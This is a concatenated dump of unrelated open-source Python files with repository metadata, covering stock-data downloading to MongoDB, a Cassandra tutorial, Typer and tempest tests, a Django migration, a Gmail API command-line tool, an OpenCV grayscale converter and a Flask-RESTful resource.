df = ts.get_k_data(code, start=starts, autype=None, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNone(code, starts='2001-01-01', index=False):
try:
df = ts.get_k_data(code, start=starts, autype=None, index=index)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def saveDB(data: pd.DataFrame, code, handler=None):
def callback(result):
# handler.send_message(handler.project_name, result, self._date + '_' + result['_id'])
pass
re = util.updateMongoDB(data, util.genKeyCodeFunc('date'), const.KData.DB_NAME,
const.KData.COLLECTION_D_HEAD + code, True, callback)
# util.everydayChange(re, 'gpfh')
#这个是前复权
def RunOne(code, force=False):
#dblist = MongoClient.list_database_names()
client = MongoClient()
db = client['stock_all_kdata']
collectionLIst = db.list_collection_names()
if not force and code in collectionLIst:
print("exist {}".format(code))
else:
#如果强制更新,删除已有数据
if force and code in collectionLIst:
db.drop_collection(code)
re = getKData(code)
saveDB2(re, code)
def saveDB2(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata",
const.KData.COLLECTION_D_HEAD + code, True, callback)
#这个是不复权
def RunOneNone(code):
client = MongoClient()
db = client['stock_all_kdata_none']
collectionList = db.list_collection_names()
if code in collectionList:
print("exist {}".format(code))
else:
re = getKDataNone(code)
saveDB3(re, code)
#最近一个月的数据
def RunOneNoneRecent(code):
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=31)
#starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone(code, starts)
saveDB3(re, code)
def RunHS300IndexRecent():
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
# starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone('000300', starts, index=True)
saveDB3(re, '000300')
def RunHS300Index():
re = getKDataNone('000300', starts='2001-01-01', index=True)
saveDB3(re, '000300')
def saveDB3(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata_none",
const.KData.COLLECTION_D_HEAD + code, True,
callback)
|
[
"reinhardtken@hotmail.com"
] |
reinhardtken@hotmail.com
|
4408f2da3cc0458926f976eb6d208f94a4dbb331
|
05a2097cbc167c0d8cfde5a039600c6994a34232
|
/custom/penn_state/constants.py
|
74aac3cb2025c0fd4a0abd1312f7931d10a6287f
|
[] |
no_license
|
shashanks/commcare-hq
|
9c641a4d830cd523410be150c2d341c4edbce38a
|
44c2bd56bcb746f1f6c7b624ddefbe4215fc791c
|
refs/heads/master
| 2020-12-11T06:12:36.705418
| 2013-12-17T08:35:23
| 2013-12-17T08:35:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
DOMAIN = 'psu-legacy-together'
DAILY_DATA_XMLNS = 'http://openrosa.org/formdesigner/B6E92793-CB42-449C-ACE7-99B0E65FE3AE'
COACH_RESPONSE_XMLNS = 'http://openrosa.org/formdesigner/D42C8CAB-F17C-4E9C-921C-CA47E6AECE15'
WEEKLY_SCHEDULE_XMLNS = 'http://openrosa.org/formdesigner/F2F7A739-BDEF-4D14-B60F-371AFE901B71'
|
[
"esoergel@gmail.com"
] |
esoergel@gmail.com
|
952498fe3ce65449fb818515ea9a956611e27c3a
|
37f48a90a33015a6e51d8b4ad839f5741a0c320f
|
/NoSQL_Cassandra/4_where_clause.py
|
68a612d995a381451d49b6fabe6b8caf595c9534
|
[] |
no_license
|
Hadryan/Data_Engineering
|
90376170a9a6a9700d1a1f32ea4b6efe6cdcbd98
|
f02db4f2ffb592277b44c2807884443c910725b1
|
refs/heads/master
| 2020-12-14T11:01:33.399933
| 2019-12-21T15:36:33
| 2019-12-21T15:36:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,248
|
py
|
# Since NoSQL has no JOINs, where becomes imperative
import cassandra
from cassandra.cluster import Cluster
print('create connection to database \n')
try:
cluster = Cluster(['127.0.0.1'])
session = cluster.connect()
except Exception as e:
print(e)
print('create keyspace/database \n')
try:
session.execute("""
CREATE KEYSPACE IF NOT EXISTS udacity
WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor': 1}""")
except Exception as e:
print(e)
# connect to key space
print('connect to key space \n')
try:
session.set_keyspace('udacity')
except Exception as e:
print(e)
# create table with query impression : 4 queries
# query 1 = all albums in a given year
# query 2 = album realeased by 'The Beatles'
# query 3 = select city from year=1970 & artist_name=The Beatles
print('create table \n')
query = "CREATE TABLE IF NOT EXISTS songs_library "
query = query + \
'(year int, artist_name text, album_name text, city text, PRIMARY KEY (year, artist_name, album_name))'
try:
session.execute(query)
except Exception as e:
print(e)
# Insert 5 rows
print('insert rows \n')
query = "INSERT INTO songs_library (year, artist_name, album_name, city)"
query = query + "values(%s, %s, %s, %s)"
try:
session.execute(query, (1970, "The Beatles", "Let It Be", 'Liverpool'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Beatles", "Rubber Soul", 'Oxford'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Who", "My Generation", 'London'))
except Exception as e:
print(e)
try:
session.execute(query, (1966, "The Monkees", "The Monkees", 'Los Angeles'))
except Exception as e:
print(e)
try:
session.execute(query, (1970, "The Carpenters",
"Close To You", 'San Diego'))
except Exception as e:
print(e)
# validate that data was inserted
print('query 1 = all albums in a given year=1970 \n')
query = "SELECT * FROM songs_library WHERE year=1970"
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 2 = album realeased by 'The Beatles' where year=1970 \n")
query = "SELECT * FROM songs_library WHERE year=1970 AND artist_name='The Beatles' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 3 = album released year=1970 AND artist_name='The Beatles' AND album_name='Let IT BE' \n ")
query = "SELECT city FROM songs_library WHERE year = 1970 AND artist_name = 'The Beatles' AND album_name = 'Let It Be' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.city)
# drop table
print("\n drop table \n")
query = "DROP TABLE songs_library"
try:
rows = session.execute(query)
except Exception as e:
print(e)
# close session & cluster connection
print('close session & connection \n')
session.shutdown()
cluster.shutdown()
|
[
"noreply@github.com"
] |
Hadryan.noreply@github.com
|
4088843b646eab6f6b40d2158cddb8ac622154dd
|
f0acc407f95b758fa734f5ed5f6506a8b20d2706
|
/tests/test_tutorial/test_options/test_name/test_tutorial004_an.py
|
087b436d55d07adedb8c0365657f3f42ab29d946
|
[
"MIT"
] |
permissive
|
shnups/typer
|
ede6d86c5b169e8caa7823b0552f8531ed041f84
|
e0b207f3f577cb2e59fdd60da39686a2f5ed0e77
|
refs/heads/master
| 2023-08-31T01:54:21.168547
| 2023-08-01T09:36:09
| 2023-08-01T09:36:09
| 313,047,732
| 0
| 0
|
MIT
| 2020-11-15T14:22:06
| 2020-11-15T14:22:05
| null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
import subprocess
import sys
import typer
from typer.testing import CliRunner
from docs_src.options.name import tutorial004_an as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_option_help():
result = runner.invoke(app, ["--help"])
assert result.exit_code == 0
assert "-n" in result.output
assert "--user-name" in result.output
assert "TEXT" in result.output
assert "--name" not in result.output
def test_call():
result = runner.invoke(app, ["-n", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_call_long():
result = runner.invoke(app, ["--user-name", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_script():
result = subprocess.run(
[sys.executable, "-m", "coverage", "run", mod.__file__, "--help"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "Usage" in result.stdout
|
[
"noreply@github.com"
] |
shnups.noreply@github.com
|
177511eb917f0c04de3ac00852473301adffedd1
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Scraper/scrapy/tests/test_command_version.py
|
f8c4ac141c2766133ad886ccb9a77791d7dbb1dc
|
[
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:73dce6f404541d9151c420cb22ff641258ce3d66e825df13aa289ff4a5c1f1ad
size 1058
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
2e74d353ab354e12d997f17a482999f383cf75ab
|
68c421b58f43c82ba1f7c5b95138f76094a44f8e
|
/telemetry_tempest_plugin/scenario/test_gnocchi.py
|
e283d2f288d9f71f0080f2164111e4f39526039b
|
[
"Apache-2.0"
] |
permissive
|
NeCTAR-RC/telemetry-tempest-plugin
|
37c986541ccad951e2cd7db3394a76a58ea1ce14
|
fc990c4ada71ca3c45df2d4733bb1fb4b7f7c9e5
|
refs/heads/master
| 2021-06-27T03:24:35.519246
| 2019-05-24T06:21:57
| 2019-05-24T06:47:41
| 194,606,282
| 0
| 0
| null | 2019-07-01T05:36:00
| 2019-07-01T05:36:00
| null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import os
from tempest import config
import tempest.test
from telemetry_tempest_plugin.scenario import utils
CONF = config.CONF
TEST_DIR = os.path.join(os.path.dirname(__file__), 'gnocchi_gabbits')
class GnocchiGabbiTest(tempest.test.BaseTestCase):
credentials = ['admin']
TIMEOUT_SCALING_FACTOR = 5
@classmethod
def skip_checks(cls):
super(GnocchiGabbiTest, cls).skip_checks()
if not CONF.service_available.gnocchi:
raise cls.skipException("Gnocchi support is required")
def _prep_test(self, filename):
token = self.os_admin.auth_provider.get_token()
url = self.os_admin.auth_provider.base_url(
{'service': CONF.metric.catalog_type,
'endpoint_type': CONF.metric.endpoint_type,
'region': CONF.identity.region})
os.environ.update({
"GNOCCHI_SERVICE_URL": url,
"GNOCCHI_SERVICE_TOKEN": token,
"GNOCCHI_AUTHORIZATION": "not used",
})
utils.generate_tests(GnocchiGabbiTest, TEST_DIR)
|
[
"sileht@sileht.net"
] |
sileht@sileht.net
|
d35548b0e453cd2577815b23e395954965d3dc5b
|
6584124fee86f79ce0c9402194d961395583d6c3
|
/blog/migrations/0008_auto_20150603_0708.py
|
3f31a14ba2dcb128cea981661d996c147b8152a8
|
[] |
no_license
|
janusnic/webman
|
fdcffb7ed2f36d0951fd18bbaa55d0626cd271e1
|
2e5eaadec64314fddc19f27d9313317f7a236b9e
|
refs/heads/master
| 2018-12-28T18:21:00.291717
| 2015-06-05T11:49:00
| 2015-06-05T11:49:00
| 35,676,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import blog.models
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_page'),
]
operations = [
migrations.CreateModel(
name='Slide',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Dratf'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
('image', models.ImageField(max_length=1024, null=True, upload_to=blog.models.get_blog_file_name, blank=True)),
],
),
migrations.CreateModel(
name='Slider',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Dratf'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.AddField(
model_name='slide',
name='related_slider',
field=models.ForeignKey(to='blog.Slider'),
),
]
|
[
"janusnic@gmail.com"
] |
janusnic@gmail.com
|
6e62b6a94f556f56721f4c83e23b79e90a9d3e9e
|
9d01e03d2e1ff388aad8331280892192e02c0f9d
|
/limix_genetics/test/test_mvnorm.py
|
3fe54045b300c7d796064df3b8d5a0c6ef22f528
|
[
"MIT"
] |
permissive
|
limix/limix-genetics
|
a1dd7e18f55ce62265ca3deaeac0b83ff71239d8
|
9c69a59a61e030243a9f865a7f7ae8842859eaee
|
refs/heads/master
| 2021-01-20T11:00:16.974644
| 2017-02-14T13:26:48
| 2017-02-14T13:26:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
from limix_genetics import mvn_ecdf, mvn_eicdf
from numpy.testing import assert_allclose
def test_mvnorm():
x = [1, 2]
mean = [1.0, -0.3]
cov = [[1.5, 0.2],
[0.2, 0.7]]
cdf = mvn_ecdf(x, mean, cov)
icdf = mvn_eicdf(cdf, mean, cov)
assert_allclose(cdf, 0.98032128770733662)
assert_allclose(cdf, mvn_ecdf(icdf, mean, cov))
|
[
"danilo.horta@gmail.com"
] |
danilo.horta@gmail.com
|
7aa31be9cc6026eb4f8b0ce8c4e7e1636d024a8f
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/50/usersdata/134/19167/submittedfiles/contido.py
|
0def95c7b5340172307b304f557314328b69cd1f
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
n = input('Quantidade de elementos de a:')
a = []
for i in range(0,n,1):
a.append(input('Digite um valor:'))
m = input('Quantidade de elementos de b:')
b = []
for i in range(0,m,1):
b.append(input('Digite um valor:'))
cont = 0
def lista(a):
a[0]
for i in range (0,len(a),1):
a[i]
return a[i]
cont = 0
if lista(a)==lista(b):
cont = cont + 1
print cont
cont
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
0e56bf8ed73462e6d8d4224877b8ef90282c3bfe
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_managing.py
|
c3d2619519ac3dfd32082a1f69f6bfb2869a39aa
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 224
|
py
|
#calss header
class _MANAGING():
def __init__(self,):
self.name = "MANAGING"
self.definitions = manage
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['manage']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
34d9075fcb8f6a7780fc543fbf024cec7ef1ce6c
|
d05c946e345baa67e7894ee33ca21e24b8d26028
|
/general/gmail-api/gmail_api.py
|
3ff3265516251943f18ce1f75b9483a7152eb03e
|
[
"MIT"
] |
permissive
|
x4nth055/pythoncode-tutorials
|
327255550812f84149841d56f2d13eaa84efd42e
|
d6ba5d672f7060ba88384db5910efab1768c7230
|
refs/heads/master
| 2023-09-01T02:36:58.442748
| 2023-08-19T14:04:34
| 2023-08-19T14:04:34
| 199,449,624
| 1,858
| 2,055
|
MIT
| 2023-08-25T20:41:56
| 2019-07-29T12:35:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,348
|
py
|
# for parsing commandline arguments
import argparse
from common import search_messages, gmail_authenticate
from read_emails import read_message
from send_emails import send_message
from delete_emails import delete_messages
from mark_emails import mark_as_read, mark_as_unread
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Send/Search/Delete/Mark messages using gmail's API.")
subparsers = parser.add_subparsers(help='Subcommands')
parser_1 = subparsers.add_parser('send', help='Send an email')
parser_1.add_argument('destination', type=str, help='The destination email address')
parser_1.add_argument('subject', type=str, help='The subject of the email')
parser_1.add_argument('body', type=str, help='The body of the email')
parser_1.add_argument('files', type=str, help='email attachments', nargs='+')
parser_1.set_defaults(action='send')
parser_2 = subparsers.add_parser('delete', help='Delete a set of emails')
parser_2.add_argument('query', type=str, help='a search query that selects emails to delete')
parser_2.set_defaults(action='delete')
parser_3 = subparsers.add_parser('mark', help='Marks a set of emails as read or unread')
parser_3.add_argument('query', type=str, help='a search query that selects emails to mark')
parser_3.add_argument('read_status', type=bool, help='Whether to mark the message as unread, or as read')
parser_3.set_defaults(action='mark')
parser_4 = subparsers.add_parser('search', help='Marks a set of emails as read or unread')
parser_4.add_argument('query', type=str, help='a search query, which messages to display')
parser_4.set_defaults(action='search')
args = parser.parse_args()
service = gmail_authenticate()
if args.action == 'send':
# TODO: add attachements
send_message(service, args.destination, args.subject, args.body, args.files)
elif args.action == 'delete':
delete_messages(service, args.query)
elif args.action == 'mark':
print(args.unread_status)
if args.read_status:
mark_as_read(service, args.query)
else:
mark_as_unread(service, args.query)
elif args.action == 'search':
results = search_messages(service, args.query)
for msg in results:
read_message(service, msg)
|
[
"fullclip@protonmail.com"
] |
fullclip@protonmail.com
|
432e3093767c4cbbc0c3e171e6b78a3877a04112
|
1fbf79261b27e4f62e2575ec702b1e6ae5820939
|
/Python/0131_04_---파이썬---.py
|
4c3964919a9ce158ff0be340ed85795975721ba4
|
[] |
no_license
|
sunnyhyo/big_data
|
9512dafccddf20a9ab91d5fe45598334cfe69d20
|
b4e2a3d0cbd690c4b773fcbe28bd5983bfd03d58
|
refs/heads/master
| 2021-05-02T14:38:39.332507
| 2018-03-03T06:45:37
| 2018-03-03T06:45:37
| 120,723,356
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
ss=input('문자열 입력==>')
print('출력 문자역==>', end="") ## end="" 옆으로 출력##
if ss.startswith('---')==False:
print("---", end="")
print(ss, end="")
if ss.endswith('---')==False:
print("---",end='')
|
[
"sunnyhyo77@gmail.com"
] |
sunnyhyo77@gmail.com
|
4d8c9e72253b36357ac9da790ac0470411996637
|
64c5341a41e10ea7f19582cbbf3c201d92768b9f
|
/webInterface/webInterface/aligner_webapp/alignworker/converters/__init__.py
|
0e064af14769dfc7fe765fe1bd5b633c0724dfa8
|
[] |
no_license
|
CLARIN-PL/yalign
|
6b050b5c330b8eaf7e1e2f9ef83ec88a8abe5164
|
6da94fbb74e803bea337e0c171c8abff3b17d7ee
|
refs/heads/master
| 2023-06-10T18:30:42.112215
| 2021-06-24T13:07:17
| 2021-06-24T13:07:17
| 51,368,327
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,508
|
py
|
import os
import logging
import shutil
import subprocess
import tempfile
from alignworker.tmp import get_temp_file
from .tokenizer import tokenize
from .detokenizer import detokenize
from .tmxconverter import to_tmx
from .tsvconverter import to_tsv
log = logging.getLogger(__name__)
def doc_to_plaintext(path):
"""TODO: Docstring for doc_to_plaintext.
:path: TODO
:returns: TODO
"""
out_path = get_temp_file()
if not(path.endswith('.doc') or path.endswith('.docx') or path.endswith('.odt')):
shutil.copyfile(path, out_path)
return out_path
log.info('Converting doc into text file from "%s" to "%s"', path, out_path)
tmp_dir = tempfile.mkdtemp(suffix='_doc_to_text_')
subprocess.call([
'soffice',
'--headless',
'--convert-to',
'txt:Text',
'--outdir',
tmp_dir,
path
])
try:
dirpath, _, filenames = next(os.walk(tmp_dir))
converted_path = os.path.join(dirpath, filenames[0])
shutil.copyfile(converted_path, out_path)
shutil.rmtree(tmp_dir)
except IndexError:
shutil.copyfile(path, out_path)
return out_path
def norm_utf8(path):
"""TODO: Docstring for norm_utf8.
:path: TODO
:returns: TODO
"""
out_path = get_temp_file()
with open(out_path, 'w', encoding='utf-8') as f:
with open(path, encoding='utf-8', errors='replace') as in_f:
for rec in in_f:
f.write(rec)
return out_path
|
[
"krzysztof@wolk.pl"
] |
krzysztof@wolk.pl
|
8f4305a715b7001f035cd96c718cd3ab7f10925d
|
05fa3773bb72a267d83b43819440c907a8fc80c3
|
/picarus/vision/video_combined_features.py
|
d22ed8765e0e8ec2a7110cec67f1c3046b98e8a7
|
[] |
no_license
|
objects-in-space-and-time/picarus
|
91ce2ac87a3acd84603996cf0e2c4f3df0a6e49e
|
04745c47396891d97dc7ad3752ebce5c9b79f33a
|
refs/heads/master
| 2020-03-27T06:01:28.562484
| 2012-12-05T07:50:16
| 2012-12-05T07:50:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 685
|
py
|
import video_raw_features
import video_block_features
import sys
import hadoopy
class Mapper(object):
def __init__(self):
self.b = video_block_features.Mapper()
self.r = video_raw_features.Mapper()
def map(self, event_filename, video_data):
hadoopy.counter('CombinedFeatures', 'DontHave')
sys.stderr.write('%s\n' % str(event_filename))
for event_filename, features in self.r.map(event_filename, video_data):
sys.stderr.write('%s\n' % str(event_filename))
for x in self.b.map(event_filename, features):
yield x
if __name__ == '__main__':
hadoopy.run(Mapper, video_block_features.Reducer)
|
[
"bwhite@dappervision.com"
] |
bwhite@dappervision.com
|
adfbe0b6910b3dfc436ae935c24ba4d89ef0505a
|
621fec63ba65d000f8f539bd6b5238202e35644b
|
/blackandwhite.py
|
3fc6f0dbcfad81e78d41f6f3d4d88542996a6f7d
|
[
"MIT"
] |
permissive
|
DiptoChakrabarty/ImageColrization
|
f764cffe82183ce951c130aa0d9af0e5c80eca48
|
c0cd1ae59ad99bced57b34376ce3191a1c2241a8
|
refs/heads/master
| 2021-01-01T12:45:54.964214
| 2020-02-24T17:09:19
| 2020-02-24T17:09:19
| 239,286,196
| 0
| 0
| null | 2020-02-09T11:00:26
| 2020-02-09T10:37:02
|
Python
|
UTF-8
|
Python
| false
| false
| 489
|
py
|
import cv2
import os
import numpy as np
path="./colored"
upload="./black"
colored=list(os.path.join(path,f) for f in os.listdir(path))
count=0
for images in colored:
count+=1
photo=cv2.imread(images)
resized=cv2.resize(photo,(400,350))
cv2.imwrite(images,resized)
cv2.imshow("lakes",photo)
cv2.waitKey()
cv2.destroyAllWindows()
dest=upload + "/image{}.png".format(count)
black=cv2.cvtColor(resized,cv2.COLOR_BGR2GRAY)
cv2.imwrite(dest,black)
|
[
"diptochuck123@gmail.com"
] |
diptochuck123@gmail.com
|
7fa051e8b4c4f78f4441293efc92b534c2a08c5c
|
c751562ea538476464a13a281f321cbfebf89b76
|
/python_stack/Django with Ajax/demos/main/apps/ajax_notes/models.py
|
c38bde3a9a7e020ce7189fdb85397987dfb674e6
|
[] |
no_license
|
brizjose/JBCodingDojo
|
7e598419c0e090be4a92f7c3e80323daa9b4bb26
|
fc161de86995d285bb5b2c39e28e9adbe04faebc
|
refs/heads/master
| 2020-03-21T09:31:02.402139
| 2019-02-18T03:45:22
| 2019-02-18T03:45:22
| 138,403,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class NoteManager(models.Manager):
def CreateNote(self, context):
messages = []
if context['title'] == "":
messages.append("Title cannot be blank, please insert title")
if context['content'] == "":
messages.append("Note content cannot be blank, please insert content")
if len(messages) == 0:
Note.objects.create(title=context['title'], content=context['content'])
new_note = Note.objects.last().id
return(True, new_note)
else:
return(False, messages)
class Note(models.Model):
title = models.CharField(max_length=255)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = NoteManager()
|
[
"brizjosem@gmail.com"
] |
brizjosem@gmail.com
|
b37de808e75120539eb4dc6c91fd2b891811f745
|
4e8cab639ddfa3e791b5b3a08aa491fb92c1ecaa
|
/Python_PostgresSQL/Python Refresher/destructuring_variables.py
|
070fb9609470e6f1b01a01bdf420cd7ba46e0835
|
[] |
no_license
|
LesediSekakatlela/SQL_projects
|
49b91bebdf6f9b1176c40c3752232ab8d3d091dd
|
9c78fc027dd137ef96446ea0946343293f3be007
|
refs/heads/main
| 2023-07-13T02:41:41.261558
| 2021-08-20T09:03:23
| 2021-08-20T09:03:23
| 386,646,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
t = 5, 11
x, y = t
print(x, y)
#2
students_attendance = {"Rolf": 96, "Bob": 80, "Anne": 100}
print(list(students_attendance.items()))
for t in students_attendance.items():
print(t)
#3
people = [("Bob", 42, "Mechanic"), ("James", 24, "Artist"), ("Harry", 32, "Lecturer")]
for name, age, profession in people:
print(f"Name: {name}, Age: {age}, Profession: {profession}")
#4
head, *tail = [1, 2, 3, 4, 5]
print(head)
print(tail)
|
[
"leseditumelo32@gmail.com"
] |
leseditumelo32@gmail.com
|
4538004f106fffe79d316a3c4935178f4a9bc725
|
0517d16821ae92719f0d96d8036cf72effb0cc36
|
/everscript/__init__.py
|
df2fb0f35bd217a79b8a7e8a4cfdb9022415082c
|
[] |
no_license
|
von/everscript
|
07ea72157f993e8c2f538c884806e37e9c7521c9
|
c61dc9f5fed679cedd9dac80718784d23e798dda
|
refs/heads/master
| 2020-04-12T07:37:46.649065
| 2013-02-13T16:23:23
| 2013-02-13T16:23:23
| 2,486,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
from constants import *
from EverNote import EverNote, EverNoteException
from Note import Note
from Notes import Notes
from Plugin import Plugin
from ToDo import ToDo
from ToDos import ToDos
|
[
"von@vwelch.com"
] |
von@vwelch.com
|
391d6b41347eaed37843d533873b24430cff13dc
|
724afba6b3534620645b0a2f7f91b1b10297458f
|
/code/resources/store.py
|
dc02bf05ba1052dec43559bcdf904348b5670e92
|
[] |
no_license
|
Jaco26/flask-with-flasksqlalchemy
|
94b9dc091ec1a9cc71aec2171ebff6733c6889d3
|
a212408c187cc390874684e7ab5e9ae0e411b617
|
refs/heads/master
| 2020-04-02T20:15:06.248009
| 2018-10-27T19:59:04
| 2018-10-27T19:59:04
| 154,762,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 926
|
py
|
from flask_restful import Resource, reqparse
from models.store import StoreModel
class Store(Resource):
def get(self, name):
store = StoreModel.find_by_name(name)
if store:
return store.json() # default HTTP status = 200
return { 'message': 'The store called {} was not found'.format(name) }, 404
def post(self, name):
if StoreModel.find_by_name(name):
return { 'message': 'The store called {} already exists'.format(name) }, 400
store = StoreModel(name)
try:
store.save_to_db()
except:
return { 'message': 'An error occured while creating the store.' }, 500
return store.json(), 201
def delete(self, name):
store = StoreModel.find_by_name(name)
if store:
store.delete_from_db()
return { 'message': 'Store deleted' }
class StoreList(Resource):
def get(self):
return { 'stores': [store.json() for store in StoreModel.query.all()] }
|
[
"jacob.albright23@gmail.com"
] |
jacob.albright23@gmail.com
|
c805769e7c7870835953e3cc6f75171540adeca0
|
ec0b8c74ae4f370e47aa1a19adfa654b2766a19f
|
/src/run_ganterpreter.py
|
33af7402ef8571b199b84fc01cc96fab9861c32e
|
[
"Apache-2.0"
] |
permissive
|
psc-g/ganterpretation
|
e8c37ce4a5ddd81c5f933a667ffef0696b56773b
|
98a963d098e0cf5a49dced1300840388001eeddf
|
refs/heads/master
| 2021-07-14T02:27:20.704844
| 2020-11-30T21:12:45
| 2020-11-30T21:12:45
| 218,511,004
| 22
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,679
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import ganterpreter
flags.DEFINE_string('output_dir', None, 'Directory where to store output.')
flags.DEFINE_string('wav_path', None, 'Path to wav file to use.')
flags.DEFINE_string('video_file_name', None,
'Name of video file, defaults to "video.avi"')
flags.DEFINE_string('model_type', 'biggan-512',
'BigGAN model type to load (biggan-{128, 256, 512})')
flags.DEFINE_list('selected_categories', [],
'Manually specified categories to use for interpolation. '
'Missing categories will be assigned randomly.')
flags.DEFINE_float('inflection_threshold', 0.035,
'Threshold on FFT TotalVariation changes to set '
'inflection points.')
flags.DEFINE_bool('verbose', False, 'Whether to print verbose messages.')
FLAGS = flags.FLAGS
def main(unused_argv):
"""Main method."""
selected_categories = [int(x) for x in FLAGS.selected_categories]
gandy = ganterpreter.GANterpreter(
model_type=FLAGS.model_type,
selected_categories=selected_categories,
verbose=FLAGS.verbose)
gandy.load_wav_file(FLAGS.wav_path, verbose=FLAGS.verbose)
gandy.compute_spectrogram(inflection_threshold=FLAGS.inflection_threshold,
verbose=FLAGS.verbose)
gandy.fill_selected_categories()
gandy.generate_video(FLAGS.output_dir,
video_file_name=FLAGS.video_file_name)
if __name__ == '__main__':
# flags.mark_flag_as_required('base_dir')
app.run(main)
|
[
"psc@google.com"
] |
psc@google.com
|
